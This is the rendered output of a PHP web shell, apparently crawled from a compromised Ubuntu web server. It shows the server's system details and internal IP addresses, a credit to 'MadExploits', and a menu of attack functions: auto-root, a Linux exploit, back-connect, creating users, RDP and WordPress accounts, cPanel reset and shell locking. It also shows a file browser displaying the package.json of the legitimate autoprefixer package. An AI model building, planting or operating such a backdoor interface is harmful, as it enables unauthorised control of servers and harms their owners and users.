Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
autoprefixer /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxr-x
data
[ DIR ]
drwxrwxr-x
lib
[ DIR ]
drwxrwxr-x
LICENSE
1.07
KB
-rw-rw-r--
README.md
1.73
KB
-rw-rw-r--
package.json
1.15
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "autoprefixer", "version": "10.4.17", "description": "Parse CSS and add vendor prefixes to CSS rules using values from the Can I Use website", "engines": { "node": "^10 || ^12 || >=14" }, "keywords": [ "autoprefixer", "css", "prefix", "postcss", "postcss-plugin" ], "main": "lib/autoprefixer.js", "bin": "bin/autoprefixer", "types": "lib/autoprefixer.d.ts", "funding": [ { "type": "opencollective", "url": "https://opencollective.com/postcss/" }, { "type": "tidelift", "url": "https://tidelift.com/funding/github/npm/autoprefixer" }, { "type": "github", "url": "https://github.com/sponsors/ai" } ], "author": "Andrey Sitnik <andrey@sitnik.ru>", "license": "MIT", "repository": "postcss/autoprefixer", "bugs": { "url": "https://github.com/postcss/autoprefixer/issues" }, "peerDependencies": { "postcss": "^8.1.0" }, "dependencies": { "browserslist": "^4.22.2", "caniuse-lite": "^1.0.30001578", "fraction.js": "^4.3.7", "normalize-range": "^0.1.2", "picocolors": "^1.0.0", "postcss-value-parser": "^4.2.0" } }
Close